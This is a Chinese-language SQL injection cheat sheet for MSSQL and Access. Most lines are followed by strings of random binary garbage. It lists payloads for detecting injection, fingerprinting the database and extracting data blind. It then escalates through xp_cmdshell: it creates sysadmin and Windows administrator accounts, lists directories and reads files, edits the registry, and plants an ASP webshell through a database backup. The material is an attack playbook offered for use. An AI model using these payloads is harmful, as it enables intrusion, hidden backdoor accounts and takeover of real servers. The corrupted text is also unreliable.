1.判断是否有注入;and 1=1 ;and 1=2 �.�l.a�(_R
2.初步判断是否是mssql ;and user>0 ]]zPq<�b�2
0#nPbe,�Lj
3.注入参数是字符'and [查询条件] and ''=' YW7b�)u�Yf
���oYukL�r
4.搜索时没过滤参数的'and [查询条件] and '%25'=' [VE��8V-�
�/`mks1:pK
5.判断数据库系统 <J^MCqp�!v
h5�(4�*$%
;and (select count(*) from sysobjects)>0 mssql Hy^N!rBxfO
�����4�^�M
;and (select count(*) from msysobjects)>0 access N;�\'�N
ne
�Av�f�Nw�E
y�&V@^��"`
zAiXo�__�x
6.猜数据库 ;and (select Count(*) from [数据库名])>0 rx] �� @A�
G� K��7![p
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ?�#fu.YE�\
E{|W(z,�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �Y'8?.a�]'
"�1�%�5��,
9.(1)猜字段的ascii值(access) V�,�cBk���
+��F�^^c2E
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Ft�&]7dT{W
`\}v#2VJ��
(2)猜字段的ascii值(mssql) �*{L)dW+:�
�H�!$�o$}A
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 1,% R;7J=g
{G�Q^fu;q�
10.测试权限结构(mssql) I���NJ�Esz
0$ S8�fF@
~^1�{B�\I�
CL�U�W!�F
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �c-(UhN3WG
Ru�>�M�F�G
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- oM>Z;QVRC:
�)v.=jup[�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- $�42{H�FGq
�~�X�O�Ts�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- x�Cc[#0R�{
eQ]~dA8>�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0���eDH�u�
/w}�u�3|L$
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- t:'Mh�9h7u
wY[+Z�T��
;and 1=(select IS_MEMBER('db_owner'));-- L���6|�oyf
^SF&=Np��V
;EP�:�o%r
w|K'M?N14�
11.添加mssql和系统的帐户 o�Y�H^_��V
,Ge��"anO�
;exec master.dbo.sp_addlogin username;-- .nx2�";oi
;exec master.dbo.sp_password null,username,password;-- ` 2V19��s]
%�5"9</a&G
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��G�$F�<$�
Wa{��`��VS
;exec master.dbo.xp_cmdshell 'net user username password ���@eKec1<
��)��Q�U��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- !
t?��iXZ
@�emK1iwm�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Ezd_`_��@R
�D$I5z�.�a
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- wNpTM8rfU#
j}.\]$��J�
CD�K�5���
�>JF�O@O5�
12.(1)遍历目录
/��}��b03
CTq&-l:f
;create table dirs(paths varchar(100), id int) Nh_Mz;ITuu
?kbiMs1;u�
;insert dirs exec master.dbo.xp_dirtree 'c:\' c7x~�{V�8
4R1<nZ"e�~
;and (select top 1 paths from dirs)>0 �j �i7[nY�
Lr~�=^��{�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ix)M�`F%P3
$QN"w�L�||
4Nh�eW��M6
�UCB/�=k^m
(2)遍历目录 ��5YeM%%-S
I�
8`VNA&b
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �
3K���lbP
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 gd`!�tRcNY
i:�Y^{\Z?V
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �+M\`#i\g>
i���J1�"at
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3Te�Y%5iVt
vqDu��(6!2
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 (��MxQ�+D\
MOQ*�]fV:�
�d928~y
W�
|
*��2w5iR
13.mssql中的存储过程 1��WxK#c-)
$P/�~rZ@M@
xp_regenumvalues 注册表根键, 子键 PN��gY�>=Y
l���rlgz�[
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��C�zs8!S
1\�
o5�9�Y
xp_regread 根键,子键,键值名 Y�g�%��I?�
sBvzAVB�L�
;exec xp_regread ;-�~B)M_S`
tE<H�|_{�L
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 3no%E0�3�p
`�T@i.��'X
xp_regwrite 根键,子键, 值名, 值类型, 值 �Lt?lv2k=L
�Y']\Jq{OS
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 cQ�CSe,$ W
tk�eoN�uAM
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 |"l�s\ �7�
Yvw(t�j5_5
xp_regdeletevalue 根键,子键,值名 %Nlt H/�I
M�?Y;�a5{
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 n'��n/Tu �
�snE8� K}4
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �bzBEX� mC
��x�<��tb
s~ a"�4~f�
^}/P�GG\~r
14.mssql的backup创建webshell le|~B�G hL
>E;uU[�v)I
use model \A �2���r]
qe�V��fE_<
create table cmd(str image); @ym v< M�o
QwW&\h�[8?
insert into cmd(str) values (''); y�-'$(�x�
:~��"CuB/�
backup database model to disk='c:\l.asp'; g:g\>@�Umo
-$�,�TMq�M
t3 8m'J :>
�X5zDpi|Dq
15.mssql内置函数 +rd|A|hRq�
vyNxT*�,[K
;and (select @@version)>0 获得Windows的版本号 kb�X8$x�TM
4Tb
#f��H%
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��HSjl�D{R
3`t#UY).F�
;and (select user_name())>0 爆当前系统的连接用户 Kr�gFKRgGj
��hZ?Ro��f
;and (select db_name())>0 得到当前连接的数据库 W�� <9T0sZ
,1~"�e�Gl!
(y=C_wv�qZ
UO�v+T8�f=
16.简洁的webshell k9s�h @ENy
�XRM_x:+]�
use model $v4.�s�l:x
ysQ_[
��]/
create table cmd(str image); RIW�xs Zt�
�ug���dQAg
insert into cmd(str) values (''); eBZXI)pP�h
.�F9�8�G/s
backup database model to disk='g:\wwwtest\l.asp';
